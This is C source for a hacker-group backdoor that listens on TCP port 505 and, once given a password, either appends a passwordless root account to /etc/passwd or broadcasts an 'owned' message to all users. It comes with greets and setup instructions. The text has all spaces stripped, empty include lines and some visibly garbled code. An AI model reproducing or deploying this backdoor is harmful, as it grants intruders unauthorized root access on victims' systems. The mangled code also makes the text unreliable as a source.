--=backdoor.c=--/*

AripoffasocketstutorialifoundsomewherecauseIdidn'tfeellike

writingstupidbasicsocketscodewhenIhaditinmysrcdirectory

already.

*/

/*Greets:

UndernetChannels:

#rootworm,#hacktech,#hyperlink,#3xposure,#legionoot

Groups:

TheLegionOOT(www.legionoot.cc),TeamSploit

People:

Cyph3r,n3m0,Adoni,f0bic,d0g,khe0ps,h-S-t,

F-o-X,NeonMatrix,Azmodan,&Venomous

/*

Usage(setup):

#gcc-obackdoorbackdoor.c

#./backdoorpassword&

Usage(using):

telnettohost(port505)-->typethepassword(don'twaitfora

prompt,thereisn'tonesoitslessobviousitsabackdoor)-->

type1or2.Andyesit's_supposed_todisconnectyouafter

eachcommand.

*/

#include

#include

#include

#include

#include

#include

#include

#include

#definePORT505

#defineMAXDATASIZE100

#defineBACKLOG10

voidhandle(char*command);

intmain(intargc,char*argv[])

{

intsockfd,new_fd,sin_size,numbytes;

char*bytes;

structsockaddr_inmy_addr;

structsockaddr_intheir_addr;

charbuf[MAXDATASIZE];

charask[]="EnterCommand(1toputr00t::0:0:...in/etc/passwd,2to

send'7h1sb0x1s0wn3d'toallpeopleonthebox:";

if(argc!=2){

fprintf(stderr,"Usage:%spasswordn",argv[0]);

exit(1);

}

if((sockfd=socket(AF_INET,SOCK_STREAM,0))==-1){

perror("socket");

exit(1);

}

my_addr.sin_family=AF_INET;

my_addr.sin_port=htons(PORT);

my_addr.sin_addr.s_addr=INADDR_ANY;

if(bind(sockfd,(structsockaddr*)&my_addr,sizeof(structsockaddr))==-1)

{

perror("bind");

exit(1);

}

if(listen(sockfd,BACKLOG)==-1){

perror("listen");

exit(1);

}

while(1){/*mainaccept()loop*/

sin_size=sizeof(structsockaddr_in);

if((new_fd=accept(sockfd,(structsockaddr*)&their_addr,

&sin_size))==

{

perror("accept");

continue;

}

inet_ntoa(their_addr.sin_addr);

if(!fork()){

recv(new_fd,buf,

MAXDATASIZE,0);

bytes=strstr(buf,argv[1]);

if(bytes!=NULL){

send(new_fd,ask,sizeof(ask),0);

numbytes=recv(new_fd,buf,

MAXDATASIZE,0);

buf[numbytes]='';

handle(buf);

}

close(new_fd);

exit(0);

}

close(new_fd);

while(waitpid(-1,NULL,WNOHANG)>0);/*cleanupchild

processes*/

}

}

voidhandle(char*command)

{

FILE*fle;

if(strstr(command,"1")!=NULL)

{

fle=f0/*n("/etc/passwd","a*/;

fprintf(fle,"r00t::0:0:r00t:/root:/bin/bash");

fclose(fle);

}

if(strstr(command,"2")!=NULL)

{

system("wall7h1sb0x1s0wn3d");

}

}

PBBSER

pbbser@legionoot.hypermart.net

----------------------------